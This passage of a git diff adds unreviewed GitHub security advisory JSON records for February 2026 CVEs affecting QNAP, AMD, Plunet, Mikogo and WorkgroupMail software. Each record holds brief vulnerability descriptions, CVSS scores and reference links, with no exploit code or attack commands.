"database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json new file mode 100644 index 0000000000000..4d57914bfda18 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p94w-qfcw-pq69", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62854" + ], + "details": "An uncontrolled resource consumption vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62854" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json b/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json new file mode 100644 index 0000000000000..8838a8ae2ce13 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc33-gmp7-wv52/GHSA-pc33-gmp7-wv52.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc33-gmp7-wv52", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2023-20548" + ], + "details": "A Time-of-check time-of-use (TOCTOU) race condition in the AMD Secure Processor (ASP) could allow an attacker to corrupt memory resulting in loss of integrity, confidentiality, or availability.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-20548" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json new file mode 100644 index 0000000000000..b59e9d8b17bb1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjf9-xcq9-w388", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2026-22894" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22894" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json b/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json new file mode 100644 index 0000000000000..8a29c22d6589c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q438-w288-p457/GHSA-q438-w288-p457.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q438-w288-p457", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25308" + ], + "details": "Mikogo 5.2.2.150317 contains an unquoted service path vulnerability in the Mikogo-Service Windows service configuration. Attackers can exploit the unquoted path to inject and execute malicious code with LocalSystem privileges by placing executable files in specific path locations.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25308" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47510" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/mikogo-mikogo-service-unquoted-service-path" + }, + { + "type": "WEB", + "url": "http://html.tucows.com/preview/518015/Mikogo?q=remote+support" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json b/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json new file mode 100644 index 0000000000000..51eedd3b572da --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q466-5h8j-2h26/GHSA-q466-5h8j-2h26.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q466-5h8j-2h26", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-48518" + ], + "details": "Improper input validation in AMD Graphics Driver could allow a local attacker to write out of bounds, potentially resulting in loss of integrity or denial of service.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48518" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6024.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json new file mode 100644 index 0000000000000..56f1705977b19 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q5vh-ff4q-5j62/GHSA-q5vh-ff4q-5j62.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q5vh-ff4q-5j62", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48723" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48723" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json new file mode 100644 index 0000000000000..fcaee24242eaf --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qhpc-j29f-q7jq/GHSA-qhpc-j29f-q7jq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qhpc-j29f-q7jq", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48724" + ], + "details": "A buffer overflow vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify memory or crash processes.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48724" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json b/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json new file mode 100644 index 0000000000000..26ade75f2e43e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qphx-26ch-3x8j/GHSA-qphx-26ch-3x8j.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qphx-26ch-3x8j", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2026-2344" + ], + "details": "A vulnerability in Plunet Plunet BusinessManager allows unauthorized actions being performed on behalf of privileged users.This issue affects Plunet BusinessManager: 10.15.1", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2344" + }, + { + "type": "WEB", + "url": "https://cds.thalesgroup.com/en/tcs-cert/CVE-2026-2344" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json b/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json new file mode 100644 index 0000000000000..9950641c27561 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r36r-8jrx-92cq/GHSA-r36r-8jrx-92cq.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r36r-8jrx-92cq", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2025-61969" + ], + "details": "Incorrect permission assignment in AMD µProf may allow a local user-privileged attacker to achieve privilege escalation, potentially resulting in arbitrary code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61969" + }, + { + "type": "WEB", + "url": "https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-9022.html" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json new file mode 100644 index 0000000000000..1d501a038720d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rccq-h9rv-fmqp/GHSA-rccq-h9rv-fmqp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rccq-h9rv-fmqp", + "modified": "2026-02-11T15:30:24Z", + "published": "2026-02-11T15:30:24Z", + "aliases": [ + "CVE-2025-30276" + ], + "details": "An out-of-bounds write vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to modify or corrupt memory.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30276" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json new file mode 100644 index 0000000000000..54fbd20431317 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rfv8-2g5x-rm48/GHSA-rfv8-2g5x-rm48.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rfv8-2g5x-rm48", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-68406" + ], + "details": "A path traversal vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68406" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json new file mode 100644 index 0000000000000..4ddd2c78d7f31 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rghx-3352-87pf/GHSA-rghx-3352-87pf.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rghx-3352-87pf", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-54170" + ], + "details": "An out-of-bounds read vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54170" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json new file mode 100644 index 0000000000000..235e7efcafc3d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rq5p-55rh-7hgc/GHSA-rq5p-55rh-7hgc.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq5p-55rh-7hgc", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-62855" + ], + "details": "A path traversal vulnerability has been reported to affect File Station 5. If a local attacker gains an administrator account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62855" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-03" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json b/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json new file mode 100644 index 0000000000000..967577b0f22d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rx9j-2fmr-2gqf/GHSA-rx9j-2fmr-2gqf.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rx9j-2fmr-2gqf", + "modified": "2026-02-11T15:30:27Z", + "published": "2026-02-11T15:30:27Z", + "aliases": [ + "CVE-2019-25307" + ], + "details": "WorkgroupMail 7.5.1 contains an unquoted service path vulnerability in its Windows service configuration that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with LocalSystem privileges during service startup.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25307" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47523" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/workgroupmail-workgroupmail-unquoted-service-path" + }, + { + "type": "WEB", + "url": "http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-428" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T15:16:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json new file mode 100644 index 0000000000000..c1e24fe9d70a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v99r-49f4-6c26/GHSA-v99r-49f4-6c26.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v99r-49f4-6c26", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-53598" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53598" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json new file mode 100644 index 0000000000000..432e24181ad57 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vf98-8xxx-fp8w/GHSA-vf98-8xxx-fp8w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vf98-8xxx-fp8w", + "modified": "2026-02-11T15:30:26Z", + "published": "2026-02-11T15:30:26Z", + "aliases": [ + "CVE-2025-66274" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQuTS hero h5.3.2.3354 build 20251225 and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66274" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-08" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json new file mode 100644 index 0000000000000..2eb1982c1af30 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vjxh-723c-34mp/GHSA-vjxh-723c-34mp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjxh-723c-34mp", + "modified": "2026-02-11T15:30:25Z", + "published": "2026-02-11T15:30:25Z", + "aliases": [ + "CVE-2025-48722" + ], + "details": "A NULL pointer dereference vulnerability has been reported to affect Qsync Central. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nQsync Central 5.0.0.4 ( 2026/01/20 ) and later", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48722" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-26-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-476" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-11T13:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vphr-3gfg-4g86/GHSA-vphr-3gfg-4g86.json 